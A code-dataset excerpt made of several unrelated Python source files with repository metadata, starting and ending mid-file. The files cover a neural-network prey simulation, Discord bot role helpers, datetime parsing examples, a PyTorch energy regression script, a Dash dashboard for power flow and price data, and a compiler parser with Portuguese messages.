SigmoidLayer(9)\n outLayer = LinearLayer(4)\n self.nn.addInputModule(inLayer)\n self.nn.addModule(hiddenLayer)\n self.nn.addOutputModule(outLayer)\n #Add connections\n in_to_hidden = FullConnection(inLayer, hiddenLayer)\n hidden_to_out = FullConnection(hiddenLayer, outLayer)\n self.nn.addConnection(in_to_hidden)\n self.nn.addConnection(hidden_to_out)\n #initialize NN\n self.nn.sortModules()\n \n # Energy - dies when reaches 0\n self.energy = 350\n\n # Max Energy. 
the max amount of energy a prey can have\n self.max_energy = 500\n\n # Location\n self.x = x\n self.y = y\n\n # direction / angle\n self.direction = direction\n\n # Senses predator\n self.senses_predator = False\n\n # predator's general direction\n self.pred_direction = 0\n\n # other prey's general direction\n self.prey_direction = 0\n\n # other prey's radius\n self.prey_radius = 0\n\n # where to move to next\n self.next_x = x\n self.next_y = y\n\n # eat or not (eating regains energy)\n self.want_to_eat = False\n\n # move or not\n self.want_to_move = False\n\n # if energy is less than 100, gets hungry status\n self.is_hungry = False\n\n # Age\n self.age = 0\n\n # output thresholds for decisions\n self.move_threshold = 0\n self.eat_threshold = 0\n\n # has it mated and reproduced yet?\n self.not_mated = True\n\n # number of attacking preds\n self.num_atk_pred = 0\n\n # energy per pred. how much energy each predator gains when eating this prey \n self.energy_per_pred = 0\n\n def update(self):\n # metabolism depends on which state the prey is in (escaping from predator, idle)\n if (self.senses_predator is True):\n if (self.energy < 25):\n self.energy = 0\n else:\n self.energy -= 25\n else: # idle mode, consumes less energy\n if (self.energy < 10):\n self.energy = 0\n else:\n self.energy -= 10\n\n if (self.energy < 100):\n self.is_hungry = True\n else:\n self.is_hungry = False\n \n # Aging\n self.age += 1\n\n\n \n # Input vector\n # input values are determined by what the animat \n # is seeing and / or touching\n input_vector = (\n (2000 * int(self.senses_predator)),\n (2000 * self.energy),\n (2000 * self.is_hungry),\n (2000 * self.direction),\n (2000 * self.pred_direction),\n (2000 * self.prey_direction),\n (2000 * self.prey_radius),\n (2000 * self.age)\n )\n\n # Activate the nn\n output_vector = self.nn.activate(input_vector)\n # move\n if (output_vector[0] > self.move_threshold):\n self.want_to_move = True\n else:\n self.want_to_move = False\n # eat\n if (output_vector[1] > self.eat_threshold):\n self.want_to_eat = True\n else:\n self.want_to_eat = False\n # direction: turn right (clockwise)\n self.direction -= output_vector[2]\n #direction: turn left (counter clockwise)\n self.direction += output_vector[3]\n\n if (self.want_to_eat):\n if (self.energy >= 400):\n self.energy = 500\n else:\n self.energy += 100\n self.is_hungry = False\n\n\n\n","repo_name":"chuj/Animats","sub_path":"Prey.py","file_name":"Prey.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22307969572","text":"from typing import Optional\n\nfrom naff import Member, Permissions\n\nfrom ElevatorBot.discordEvents.customInteractions import ElevatorInteractionContext\nfrom ElevatorBot.misc.formatting import embed_message\n\n\nasync def has_admin_permission(\n member: Member, ctx: Optional[ElevatorInteractionContext] = None, hidden: bool = True\n) -> bool:\n \"\"\"Returns if the member has admin permission\"\"\"\n\n result = member.has_permission(Permissions.ADMINISTRATOR)\n if ctx:\n if not ctx.responded:\n embed = embed_message(\n \"Error\",\n \"You need admin permissions to do this\",\n )\n\n await ctx.send(embeds=embed, ephemeral=hidden)\n\n return result\n\n\nasync def assign_roles_to_member(member: Member, *role_ids: int, reason: Optional[str] = None):\n \"\"\"Assigns the role_ids to the member if they exist, else fails silently\"\"\"\n\n guild = member.guild\n\n # check if member is not pending\n if not member.pending:\n 
# loop through role_ids and get the role objs\n for role_id in role_ids:\n role = await guild.fetch_role(role_id)\n\n if not role:\n continue\n\n # assign them\n await member.add_role(role=role, reason=reason)\n\n\nasync def remove_roles_from_member(member: Member, *role_ids: int, reason: Optional[str] = None):\n \"\"\"Removes the role_ids from the member if they exist, else fails silently\"\"\"\n\n guild = member.guild\n\n # check if member is not pending\n if not member.pending:\n # loop through role_ids and get the role objs\n for role_id in role_ids:\n role = await guild.fetch_role(role_id)\n\n if not role:\n continue\n\n # remove them\n await member.remove_role(role=role, reason=reason)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/misc/discordShortcutFunctions.py","file_name":"discordShortcutFunctions.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"27600705924","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/8/5 20:02\n# @File : p15_convert_strings_into_datetimes.py\n# @Software: PyCharm\n\n\"\"\"Convert strings into datetimes\"\"\"\n\nfrom datetime import datetime\n\n# parse a date\ntext = '2019-08-03'\ny = datetime.strptime(text, '%Y-%m-%d')\nz = datetime.now()\nprint(z - y)\n\n# format a date\nnice_z = datetime.strftime(z, '%A %B %d, %Y')\nprint(nice_z)\n\n\n# strptime() is relatively slow; to parse a large number of dates, you can implement your own parsing function\ndef parse_ymd(s):\n year_s, mon_s, day_s = s.split('-')\n return datetime(int(year_s), int(mon_s), int(day_s))\ntext = '2019-08-03'\nx = parse_ymd(text)\nprint(x)\n","repo_name":"mofei952/cookbook","sub_path":"c03_numbers_dates_times/p15_convert_strings_into_datetimes.py","file_name":"p15_convert_strings_into_datetimes.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12477343117","text":"# -*- coding: utf-8 -*-\n\nimport net\nimport torch\nimport numpy as np\nimport copy\n\nx = np.loadtxt(\"../data_mat/dataTrain.dat\")\ny = np.loadtxt(\"../data_mat/valuTrain.dat\")\nx_val = np.loadtxt(\"../data_mat/dataVali.dat\")\ny_val = np.loadtxt(\"../data_mat/valuVali.dat\")\n\nx = torch.as_tensor(x, dtype=torch.float32)\ny = torch.as_tensor(y, dtype=torch.float32).reshape(len(y),1)\nx_val = torch.as_tensor(x_val, dtype=torch.float32)\ny_val = torch.as_tensor(y_val, dtype=torch.float32).reshape(len(y_val), 1)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nx = x.to(device)\ny = y.to(device)\nx_val = x_val.to(device)\ny_val = y_val.to(device)\n\nmodel = net.energyRegNet()\nmodel.to(device)\n\nlossFunc = torch.nn.MSELoss().to(device)\ntrainLoss = torch.nn.MSELoss().to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-5)\nlearR = 1e-5\nlossReg = 1.\nerrlis = np.zeros(100)\nmodel.train()\nfor t in range(500000):\n ypred = model(x)\n loss = trainLoss(ypred, y)\n print(t, loss.item())\n if t > 100 and t % 100 == 0 and np.average(errlis[-50:]) > np.average(errlis[:50]):\n learR /= 2\n optimizer = torch.optim.Adam(model.parameters(), lr=learR)\n print(\"update learning rate, now is: \"+str(learR))\n errlis[t % 100] = loss.item()\n if(t % 25 == 0):\n model.eval()\n tmpy = model.forward(x_val)\n losstmp = np.sqrt(lossFunc(tmpy, y_val).item())\n if losstmp < lossReg:\n modelReg = copy.deepcopy(model)\n lossReg = losstmp\n torch.save(modelReg, \"./model.pt\")\n print(\"the \"+str(t)+\"-th training result is: 
\"+str(losstmp))\n model.train()\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \ntorch.save(modelReg, \"./model_mat.pt\")\n\nmodelReg.eval()\n\ntest = np.loadtxt(\"../data_mat/dataTest.dat\")\ntest = torch.as_tensor(test, dtype = torch.float32).to(device)\n\ntestval = modelReg(test)\n\nwith open(\"./resTest.dat\", \"w\") as f:\n f.write(\"Id,Predicted\\n\")\n ind = 1\n for tv in testval:\n f.write(str(ind) + \",\\t\" + str(tv.item())+\"\\n\")\n ind += 1","repo_name":"wzdlc1996/EnergyPred","sub_path":"hist/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9855679812","text":"import dash\nfrom dash import dcc\nfrom dash import html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input,Output,State,MATCH,ALL\nimport pandas as pd\nimport pickle as pkl\nimport os\nimport base64\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom string import digits\nimport json\nfrom flask import Flask\nimport math\nfrom dash_extensions.snippets import send_data_frame\nfrom dash_extensions import Download\nimport flow_page\nimport price_page\nimport capacity_page\nimport net_import\nimport country_converter as coco\n\n#standard_names = coco.convert(names=['NO-02'], to='name_short')\n#print(standard_names)\n\n\nserver = Flask(__name__)\napp = dash.Dash(\n __name__,server=server,\n meta_tags=[\n {\n 'charset': 'utf-8',\n },\n {\n 'name': 'viewport',\n 'content': 'width=device-width, initial-scale=1.0' #, shrink-to-fit=no\n }\n ] ,\n)\n\nwith open(\"NetImport_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n\ncountries = list(object.keys())\nprint(countries)\n#df = object['FRA']\n#df.to_csv('FRA.csv')\n#print(df)\n#print(df.columns)\nprint('2022.5'.split('.'))\n\n#df=object['DEU']\n#print(df.head())\n#print(df.columns)\n#df.to_csv('DEU.csv')\n\n#dic=capacity_page.get_lon_lat(origins)\n#print(dic)\n\n#map_df=capacity_page.add_lon_lat(map_df)\n\n\n\n#map_df=pd.read_csv('map_data.csv')\n#print(map_df['origin'].unique())\n\n\n\n\n#external_stylesheets=[dbc.themes.BOOTSTRAP]\napp.config.suppress_callback_exceptions = True\n\ntext_font_size='1.7vh'\nnavbar_font_size='2vh'\nheader_font_size='2vh'\n\nencoded = base64.b64encode(open('plotly.png', 'rb').read())\n\nlogo_img=html.Img(src='data:image/jpg;base64,{}'.format(encoded.decode()), id='logo_img', height='70vh',\n style=dict(marginLeft='1vh'))\n\ndb_logo_img=dbc.Col([ logo_img] ,\n xs=dict(size=2,offset=0), sm=dict(size=2,offset=0),\n md=dict(size=1,offset=0), lg=dict(size=1,offset=0), xl=dict(size=1,offset=0))\n\nheader_text=html.Div('Data Visualization Dashboard',style=dict(color='white',\n fontWeight='bold',fontSize='2.8vh',marginTop='1vh',marginLeft='1.5vh'))\n\ndb_header_text= dbc.Col([ header_text] ,\n xs=dict(size=10,offset=0), sm=dict(size=10,offset=0),\n md=dict(size=10,offset=0), lg=dict(size=10,offset=0), xl=dict(size=10,offset=0))\n\n\n\n\nnavigation_header=dbc.Nav(\n [\n dbc.NavItem(dbc.NavLink(\"Flow\", active='exact', href=\"/Flow\",id='Flow',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"Power Planets\", href=\"/Planets\",active='exact',id='Planets',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"Power price\", href=\"/price\", active='exact', id='price',className=\"page-link\",\n 
style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"NetImport\", href=\"/NetImport\", active='exact', id='NetImport',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"TransmisionCap\", href=\"/TransmisionCap\", active='exact', id='TransmisionCap',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary')))\n\n ],\n pills=True,\n)\ndb_navigation_header=dbc.Col([navigation_header],\n xs=dict(size=12, offset=0), sm=dict(size=12, offset=0),\n md=dict(size=12, offset=0), lg=dict(size=5, offset=1), xl=dict(size=5, offset=1)\n )\n\n\n\n#print( list( object.keys() ) )\n\n#print('DEU_AUT' , object['DEU_AUT'].head() )\n\n#filtered_by_hours = int((df.index.max() - df.index.min()) / pd.Timedelta('1 hour'))\n#dtick_hours=math.ceil( filtered_by_hours / (12) )\n\n\n\n\n\n\n\n\n\n\n\n\napp.layout=html.Div([ dbc.Row([db_logo_img,db_header_text],style=dict(backgroundColor='#20374c') )\n ,dbc.Row([db_navigation_header]) , html.Br() ,dbc.Row( id='layout')\n\n ,dcc.Location(id='url', refresh=True,pathname='/Flow')\n\n ])\n\n\n\n\n\n@app.callback(Output('layout','children'),\n Input('url','pathname'))\ndef change_page(url):\n if url == '/Flow':\n layout=flow_page.creat_flow_layout()\n return layout\n\n elif url == '/price':\n layout=price_page.creat_price_layout()\n return layout\n\n elif url == '/TransmisionCap':\n layout=capacity_page.create_capacity_layout()\n return layout\n\n elif url == '/NetImport':\n layout=net_import.create_net_import_layout()\n return layout\n\n else:\n return dash.no_update\n\n@app.callback([Output('flow_line_chart','figure'),Output('flow_data','data')],\n [Input('flow_country_menu','value'),Input('flow_resolution_menu','value'),Input('flow_scenarios_list','value')]\n )\ndef update_flow_line_chart(selected_countries,selected_resolution,selected_scenarios):\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n # countries = list(object.keys())\n df = object['{}'.format(selected_countries)]\n df.set_index('Date', inplace=True)\n df.columns=['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n\n df['Exp']=df.iloc[: , :-1].mean(axis=1)\n graph_data =df.resample('3M').mean()\n if selected_resolution == 'Mean Agg. Quarterly':\n graph_data=df.resample('3M').mean()\n\n elif selected_resolution == 'Sum Agg. Quarterly':\n graph_data=df.resample('3M').sum()\n\n elif selected_resolution == 'Mean Agg. Monthly':\n graph_data=df.resample('1M').mean()\n\n elif selected_resolution == 'Sum Agg. Monthly':\n graph_data=df.resample('1M').sum()\n\n elif selected_resolution == 'Mean Agg. Daily':\n graph_data=df.resample('1D').mean()\n\n elif selected_resolution == 'Sum Agg. 
Daily':\n graph_data=df.resample('1D').sum()\n\n elif selected_resolution== 'Hourly':\n graph_data=df\n\n fig=go.Figure()\n colors = px.colors.qualitative.Light24\n colors[0]='lightsalmon'\n colors.extend(['#d5f4e6','#80ced6','#c83349'])\n scenarios_colors = {'1991': colors[0], '1992': colors[1], '1993': colors[2], '1994': colors[3],\n '1995': colors[4], '1996': colors[5], '1997': colors[6], '1998': colors[7],\n '1999': colors[8], '2000': colors[9],'2001': colors[10],'2002': colors[11],'2003': colors[12]\n ,'2004': colors[13],'2005': colors[14],'2006': colors[15],'2007': colors[16],'2008': colors[17],\n '2009': colors[18],'2010': colors[19],'2011': colors[20],'2012': colors[21],'2013': colors[22],\n '2014': colors[23],'2015': colors[24],'Normal': colors[25],'Exp':colors[26]}\n i=0\n for scenario in selected_scenarios:\n fig.add_trace(go.Scatter(x=graph_data.index, y=graph_data[scenario], mode='lines', name=scenario,\n marker_color=scenarios_colors[scenario]\n ))\n i+=1\n\n\n fig.update_layout(\n title='Power Flow', xaxis_title='Date', yaxis_title='MWh/h',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=16, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c',\n xaxis=dict(\n\n tickwidth=2, tickcolor='lightsalmon',\n ticks=\"outside\",\n tickson=\"labels\",\n rangeslider_visible=False\n )\n )\n#boundaries\n # 0f2537\n\n fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n fig.update_yaxes(showgrid=False, showline=True, zeroline=False)\n graph_data['Date']=graph_data.index\n selected_scenarios.append('Date')\n return (fig , graph_data[selected_scenarios].to_dict('records'))\n\n\n\n\n\n@app.callback([Output('price_line_chart','figure'),Output('price_data','data')],\n [Input('price_country_menu','value'),Input('price_resolution_menu','value'),Input('price_scenarios_list','value')]\n )\ndef update_price_line_chart(selected_countries,selected_resolution,selected_scenarios):\n with open(\"PowerPrice_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n # countries = list(object.keys())\n df = object['{}'.format(selected_countries)]\n df.set_index('Date', inplace=True)\n df.columns=['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n\n df['Exp']=df.iloc[: , :-1].mean(axis=1)\n graph_data =df.resample('3M').mean()\n\n graph_data =df.resample('3M').mean()\n if selected_resolution == 'Mean Agg. Quarterly':\n graph_data=df.resample('3M').mean()\n\n elif selected_resolution == 'Sum Agg. Quarterly':\n graph_data=df.resample('3M').sum()\n\n elif selected_resolution == 'Mean Agg. Monthly':\n graph_data=df.resample('1M').mean()\n\n elif selected_resolution == 'Sum Agg. Monthly':\n graph_data=df.resample('1M').sum()\n\n elif selected_resolution == 'Mean Agg. Daily':\n graph_data=df.resample('1D').mean()\n\n elif selected_resolution == 'Sum Agg. 
Daily':\n graph_data=df.resample('1D').sum()\n\n elif selected_resolution== 'Hourly':\n graph_data=df\n\n fig=go.Figure()\n colors = px.colors.qualitative.Light24\n colors[0]='lightsalmon'\n colors.extend(['#d5f4e6','#80ced6','#c83349'])\n scenarios_colors = {'1991': colors[0], '1992': colors[1], '1993': colors[2], '1994': colors[3],\n '1995': colors[4], '1996': colors[5], '1997': colors[6], '1998': colors[7],\n '1999': colors[8], '2000': colors[9],'2001': colors[10],'2002': colors[11],'2003': colors[12]\n ,'2004': colors[13],'2005': colors[14],'2006': colors[15],'2007': colors[16],'2008': colors[17],\n '2009': colors[18],'2010': colors[19],'2011': colors[20],'2012': colors[21],'2013': colors[22],\n '2014': colors[23],'2015': colors[24],'Normal': colors[25],'Exp':colors[26]}\n i=0\n for scenario in selected_scenarios:\n fig.add_trace(go.Scatter(x=graph_data.index, y=graph_data[scenario], mode='lines', name=scenario,\n marker_color=scenarios_colors[scenario]\n ))\n i+=1\n\n\n fig.update_layout(\n title='Power Price', xaxis_title='Date', yaxis_title='€/MWh',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=16, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c',\n xaxis=dict(\n\n tickwidth=2, tickcolor='lightsalmon',\n ticks=\"outside\",\n tickson=\"labels\",\n rangeslider_visible=False\n )\n )\n#boundaries\n # 0f2537\n\n fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n fig.update_yaxes(showgrid=False, showline=True, zeroline=False)\n graph_data['Date']=graph_data.index\n selected_scenarios.append('Date')\n return (fig , graph_data[selected_scenarios].to_dict('records'))\n\n\n\n\n@app.callback([Output('cap_line_chart','figure'),Output('cap_data','data')],\n [Input('cap_country_menu','value'),Input('cap_resolution_menu','value')]\n )\ndef update_cap_line_chart(selected_countries,selected_resolution):\n with open(\"TransmissionCap_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n # countries = list(object.keys())\n df = object['{}'.format(selected_countries)]\n df.set_index('Date', inplace=True)\n df.columns=['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n\n graph_data =df.resample('3M').mean()\n if selected_resolution == 'Mean Agg. Quarterly':\n graph_data=df.resample('3M').mean()\n\n elif selected_resolution == 'Sum Agg. Quarterly':\n graph_data=df.resample('3M').sum()\n\n elif selected_resolution == 'Mean Agg. Monthly':\n graph_data=df.resample('1M').mean()\n\n elif selected_resolution == 'Sum Agg. Monthly':\n graph_data=df.resample('1M').sum()\n\n elif selected_resolution == 'Mean Agg. Daily':\n graph_data=df.resample('1D').mean()\n\n elif selected_resolution == 'Sum Agg. 
Daily':\n graph_data=df.resample('1D').sum()\n\n elif selected_resolution== 'Hourly':\n graph_data=df\n\n fig=go.Figure()\n\n\n fig.add_trace(go.Scatter(x=graph_data.index, y=graph_data['Normal'], mode='lines', name='Normal',\n marker_color='#80ced6' , showlegend=True\n ))\n\n\n\n fig.update_layout(\n title='Power Capacity', xaxis_title='Date', yaxis_title='MW',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=16, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c',\n xaxis=dict(\n\n tickwidth=2, tickcolor='lightsalmon',\n ticks=\"outside\",\n tickson=\"labels\",\n rangeslider_visible=False\n )\n )\n#boundaries\n # 0f2537\n\n fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n fig.update_yaxes(showgrid=False, showline=True, zeroline=False)\n graph_data['Date']=graph_data.index\n\n return (fig , graph_data.to_dict('records'))\n\n\n\n\n\n@app.callback(Output('flow_csv_download_data', 'data'),\n Input('flow_download_csv', 'n_clicks'),State('flow_data','data')\n\n ,prevent_initial_call=True)\ndef download_flow_csv(clicks,flow_data):\n flow_df=pd.DataFrame(flow_data)\n return send_data_frame(flow_df.to_csv, \"flow_data.csv\")\n\n\n@app.callback(Output('price_csv_download_data', 'data'),\n Input('price_download_csv', 'n_clicks'),State('price_data','data')\n\n ,prevent_initial_call=True)\ndef download_flow_csv(clicks,price_data):\n price_df=pd.DataFrame(price_data)\n return send_data_frame(price_df.to_csv, \"price_data.csv\")\n\n@app.callback(Output('cap_csv_download_data', 'data'),\n Input('cap_download_csv', 'n_clicks'),State('cap_data','data')\n\n ,prevent_initial_call=True)\ndef download_cap_csv(clicks,cap_data):\n cap_df=pd.DataFrame(cap_data)\n return send_data_frame(cap_df.to_csv, \"cap_data.csv\")\n\n\n@app.callback(Output('capacity_map', 'figure'),\n Input('cap_map_slider', 'value'))\ndef update_cap_map(years_range):\n with open(\"TransmissionCap_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n map_fig=capacity_page.create_cap_map(object, years_range)\n return map_fig\n\n@app.callback(Output('flow_bar_chart', 'figure'),\n Input('flow_bar_slider', 'value'))\ndef update_flow_bar(years_range):\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n bar_fig=flow_page.create_flow_bar_fig(object,years_range)\n return bar_fig\n\n@app.callback(Output('price_bar_chart', 'figure'),\n Input('price_bar_slider', 'value'))\ndef update_price_bar(years_range):\n with open(\"PowerPrice_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n bar_fig=price_page.create_price_bar_fig(object,years_range)\n return bar_fig\n\n\n@app.callback(Output('net_import_map', 'figure'),\n Input('net_imp_map_slider', 'value'))\ndef update_net_map(years_range):\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n map_fig=net_import.create_net_import_map(object, years_range)\n return map_fig\n\nif __name__ == '__main__':\n app.run_server(host='localhost',port=8050,debug=True,dev_tools_silence_routes_logging=True)","repo_name":"rodiscience/ML-model-dashboard","sub_path":"assets/updates2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16274,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"39272675106","text":"from src.Scanner import Scanner\nfrom src.utils import token_table\n\n\nclass Parser:\n\n def __init__(self, file):\n self.sintax_is_right = True\n self.file = file\n self.token 
= None\n self.context = {}\n self.aux = 0\n\n self.code = open(\"codigo_intermediario.txt\", \"w\")\n\n def run(self):\n with open(self.file) as code:\n self.scanner = Scanner(code)\n self.scanner.lookahead = self.scanner.read()\n\n while self.scanner.lookahead:\n self.program()\n \n def program (self):\n \"\"\"\n ::= int main ( ) \n \"\"\"\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['int']:\n self.scanner.error('Programa não iniciado por declaração de int.')\n\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['main']:\n self.scanner.error('Função main não declarada.')\n\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['(']:\n self.scanner.error('Parênteses não abertos.')\n\n self.token = self.scanner.get_token()\n if self.token[0] != token_table[')']:\n self.scanner.error('Parênteses não fechados.')\n\n self.token = self.scanner.get_token()\n self.code_block()\n \n self.token = self.scanner.get_token()\n if self.token:\n self.scanner.error('Programa não finalizado com fechamento de bloco de código.')\n\n def code_block(self):\n \"\"\"\n ::= { * * }\n \"\"\"\n previous_context = self.context.copy()\n\n if self.token[0] != token_table['{']:\n self.scanner.error(\"Bloco de código não iniciado por '{'\")\n \n self.token = self.scanner.get_token()\n while (self.token != None and self.token[0] != token_table['}']):\n \n if self.type():\n self.declaration_of_variable(self.token[1], previous_context)\n\n else:\n self.command()\n \n self.token = self.scanner.get_token()\n\n if self.token[0] != token_table['}']:\n self.scanner.error(\"Bloco de código não finalizado por '}'\")\n\n self.context = previous_context\n\n def declaration_of_variable(self, var_type, previous_context):\n \"\"\"\n ::= ;\n \"\"\"\n\n # id\n self.token = self.scanner.get_token()\n if (self.token[0] != token_table['id']):\n self.scanner.error(\"Token esperado: identificador\")\n self.write_code(var_type)\n self.write_code(self.token[1], ';\\n')\n \n if self.token[1] in self.context.keys() and self.token[1] not in previous_context.keys():\n self.scanner.error(\"Variável já declarada no mesmo escopo\")\n self.context[self.token[1]] = var_type\n\n self.token = self.scanner.get_token()\n while (self.token[0] == token_table[',']):\n self.token = self.scanner.get_token()\n if (self.token[0] != token_table['id']):\n self.scanner.error(\"Token esperado: identificador\")\n self.write_code(var_type)\n self.write_code(self.token[1], ';\\n')\n\n if self.token[1] in self.context.keys() and self.token[1] not in previous_context.keys():\n self.scanner.error(\"Variável já declarada no mesmo escopo\")\n self.context[self.token[1]] = var_type\n self.token = self.scanner.get_token()\n\n if (self.token[0] != token_table[';']):\n self.scanner.error(\"; esperado ao final de declaração de variável\")\n\n def command(self):\n \"\"\"\n ::= | | if ( ) else +\n \"\"\"\n if (self.token[0] == token_table['id'] or self.token[0] == token_table['{']):\n self.basic_command()\n elif(self.token[0] == token_table['while']):\n self.iteration()\n elif(self.token[0] == token_table['if']):\n self.if_command()\n else:\n self.scanner.error('Bloco de comando mal formado.')\n\n\n def basic_command(self):\n \"\"\"\n ::= | \n \"\"\"\n if (self.token[0] == token_table['id']):\n if self.token[1] not in self.context:\n self.scanner.error('Uso de variável não declarada')\n self.attr(self.context[self.token[1]])\n elif(self.token[0] == token_table['{']):\n self.code_block()\n\n def 
if_command(self):\n \"\"\"\n if ( ) else +\n \"\"\"\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['(']):\n self.relational_expression()\n \n if self.token[0] != token_table[')']:\n self.scanner.error('Parênteses desbalanceados no if.')\n \n self.token = self.scanner.get_token()\n self.command()\n\n self.token = self.scanner.get_token()\n if self.token[0] == token_table['else']:\n self.token = self.scanner.get_token()\n self.command()\n\n else:\n self.scanner.error('Comando if não seguido por abertura de parênteses.')\n\n def iteration(self):\n \"\"\"\n ::= while ( ) \n \"\"\"\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['(']:\n self.scanner.error('Comando while não seguido por abertura de parênteses.')\n \n self.relational_expression()\n\n if self.token[0] != token_table[')']:\n self.scanner.error('Parênteses desbalanceados no while.')\n\n self.token = self.scanner.get_token()\n self.command()\n\n def attr(self, var_type_a):\n \"\"\"\n ::= = ;\n \"\"\"\n self.aux = 0\n var = self.token[1]\n\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['=']):\n \n var_type_b, expr = self.arithmetic_expression()\n\n if var_type_a != var_type_b:\n self.scanner.error('Atribuição de variável de tipos diferentes')\n\n #self.token = self.scanner.get_token()\n if self.token[0] != token_table[';']:\n self.scanner.error('Esperado ; ao final de atribuição.')\n\n self.write_code(var + ' = ' + expr, ';\\n')\n\n else:\n self.scanner.error('Operador de atribuição esperado.')\n\n def relational_expression(self):\n \"\"\"\n ::= \n \"\"\"\n var_type_a, expr = self.arithmetic_expression()\n\n self.relational_operator()\n\n var_type_b, expr2 = self.arithmetic_expression()\n\n if var_type_a != var_type_b:\n self.scanner.error('Operação relacional com tipos diferentes')\n\n def relational_operator(self):\n \"\"\"\n ::= == | != | < | > | <= | >=\n \"\"\"\n if (self.token[0] == token_table['=='] \n or self.token[0] == token_table['!='] \n or self.token[0] == token_table['<'] \n or self.token[0] == token_table['>'] \n or self.token[0] == token_table['<='] \n or self.token[0] == token_table['>=']):\n return True\n else:\n self.scanner.error('Operador relacional esperado.')\n\n def arithmetic_expression(self):\n \"\"\"\n ::= \n \"\"\"\n var_type_a, expr = self.term()\n var_type_b, expr2 = self.derived_arithmetic_expression(var_type_a, expr)\n\n if expr2 is not None:\n var_type_a = var_type_b\n expr = expr2\n return var_type_a, expr\n\n def derived_arithmetic_expression(self, var_type_a, expr, flag=False):\n \"\"\"\n ::= + | - | null\n \"\"\"\n if (self.token[0] == token_table['+'] or self.token[0] == token_table['-']):\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n\n expr = expr + ' ' + self.token[1]\n var_type_b, expr2 = self.term()\n \n if expr2 is not None and flag is False:\n expr = expr + ' ' + expr2\n\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n else:\n expr = expr + ' ' + expr2\n\n if var_type_a != var_type_b and var_type_a is not None and var_type_b is not None:\n self.scanner.error('Operação aritmética com tipos diferentes')\n \n _, expr3 = self.derived_arithmetic_expression(var_type_a, expr, flag=True)\n\n if expr3 is not None:\n expr = expr3\n\n return var_type_a, expr\n else:\n return None, 
